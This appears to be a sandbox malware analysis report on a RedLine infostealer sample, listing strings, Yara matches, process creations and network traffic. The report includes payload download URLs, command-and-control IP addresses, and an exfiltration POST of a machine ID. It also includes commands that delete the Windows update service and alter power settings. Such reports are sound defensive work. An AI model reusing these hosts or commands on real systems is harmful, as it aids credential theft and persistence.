Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4y/
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.398763861.000000000794B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: nss3.dll.53.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: N2wufLmC74.exe	String found in binary or memory: http://www.entrust.net/rpa0
Source: vbc.exe, 00000002.00000002.374200446.000000000760A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375240720.0000000007637000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375395797.000000000764A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.373841175.00000000075FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/dmi1dfg7n.kjylug
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/f429fjd4uf84u.sdfh
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.373841175.00000000075FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/hiuhehufw.hfe
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/ofg7d45fsdfgg312.sfhg
Source: vbc.exe, 00000002.00000002.375240720.0000000007637000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.373841175.00000000075FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org4
Source: vbc.exe, 00000002.00000002.374726372.0000000007622000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375741323.000000000765C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.orgD8
Source: vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: N2wufLmC74.exe, N2wufLmC74.exe, 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: vbc.exe, 00000002.00000002.374200446.000000000760A000.00000004.00000800.00020000.00000000.sdmp, conchsvt.exe, 0000000C.00000000.306464420.0000000000512000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vbc.exe, 00000002.00000002.376159529.0000000007674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/976559212974997544/1048575639000715314/zonewar.exe
Source: vbc.exe, 00000002.00000002.376159529.0000000007674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com4
Source: vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: N2wufLmC74.exe	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000003.515540013.0000022781C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: nss3.dll.53.dr	String found in binary or memory: https://mozilla.org0
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: nss3.dll.53.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: N2wufLmC74.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: vbc.exe, 00000002.00000002.424448010.000000000874E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413288145.0000000008656000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.377430537.00000000076CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423586975.0000000008731000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379739949.0000000007757000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.408744152.000000000856F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: www.idpminic.org

Source: global traffic	HTTP traffic detected: GET /attachments/976559212974997544/1048575639000715314/zonewar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/hiuhehufw.hfe HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 20112211Host: 77.73.133.23Connection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131
Source: unknown	TCP traffic detected without corresponding DNS query: 45.15.157.131

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: 20112211Host: 77.73.133.23Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 65 38 36 39 31 61 31 33 37 33 65 66 31 64 64 35 63 34 66 32 65 36 36 66 62 39 62 35 38 62 33 62 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e8691a1373ef1dd5c4f2e66fb9b58b3b

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49706 version: TLS 1.2

Source: ofg.exe, 00000016.00000002.519190808.000000000079A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 22.0.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 26.2.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.3.N2wufLmC74.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 22.2.ofg.exe.d00000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 26.0.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.N2wufLmC74.exe.14817a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.N2wufLmC74.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013DF1C0	0_2_013DF1C0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013DC030	0_2_013DC030
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01409440	0_2_01409440
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01423440	0_2_01423440
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01417410	0_2_01417410
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013E04F0	0_2_013E04F0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013F9710	0_2_013F9710
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014169C0	0_2_014169C0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_014188C0	0_2_014188C0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013F6B10	0_2_013F6B10
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013FFB70	0_2_013FFB70
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01407B80	0_2_01407B80
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0140BA90	0_2_0140BA90
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_0140EDD0	0_2_0140EDD0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013CDD90	0_2_013CDD90
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013E1C70	0_2_013E1C70
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013D7CB0	0_2_013D7CB0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01400CA0	0_2_01400CA0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_01417E70	0_2_01417E70
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013D9E00	0_2_013D9E00
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715B91770	14_2_00007FF715B91770
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715B93170	14_2_00007FF715B93170
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715B96EE0	14_2_00007FF715B96EE0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715B929D0	14_2_00007FF715B929D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715BB2510	14_2_00007FF715BB2510

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: sqlite3.dll.53.dr	Static PE information: Number of sections : 18 > 10
Source: zonewar.exe.2.dr	Static PE information: Number of sections : 15 > 10
Source: updater.exe.14.dr	Static PE information: Number of sections : 11 > 10
Source: brave.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: N2wufLmC74.exe	Static PE information: Number of sections : 17 > 10

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Chrome\updater.exe 9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F

Source: N2wufLmC74.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE

Source: 22.0.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 59.0.GoogleUpdate.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 26.2.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 51.0.GoogleUpdate.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 0.3.N2wufLmC74.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 22.2.ofg.exe.d00000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 25.2.chrome.exe.7748a8.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 26.0.ofg.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.N2wufLmC74.exe.14817a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.N2wufLmC74.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object

Source: C:\Users\user\AppData\Local\Google\chrome.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF715BC1250 appears 107 times
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF715BC2490 appears 59 times
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: String function: 014797B0 appears 58 times
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: String function: 014657D0 appears 210 times
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: String function: 014796C0 appears 31 times
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: String function: 0142F620 appears 202 times

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715B94C80 NtClose,

14_2_00007FF715B94C80

Source: 8FB9.tmp.14.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: N2wufLmC74.exe	Binary or memory string: OriginalFilename vs N2wufLmC74.exe
Source: N2wufLmC74.exe, 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStipends.exe4 vs N2wufLmC74.exe

Source: N2wufLmC74.exe

Static PE information: invalid certificate

Source: N2wufLmC74.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@97/31@6/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715BA6EE0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

14_2_00007FF715BA6EE0

Source: C:\Users\user\AppData\Local\Google\brave.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: N2wufLmC74.exe	ReversingLabs: Detection: 65%
Source: N2wufLmC74.exe	Virustotal: Detection: 43%

Source: C:\Users\user\Desktop\N2wufLmC74.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\N2wufLmC74.exe C:\Users\user\Desktop\N2wufLmC74.exe
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
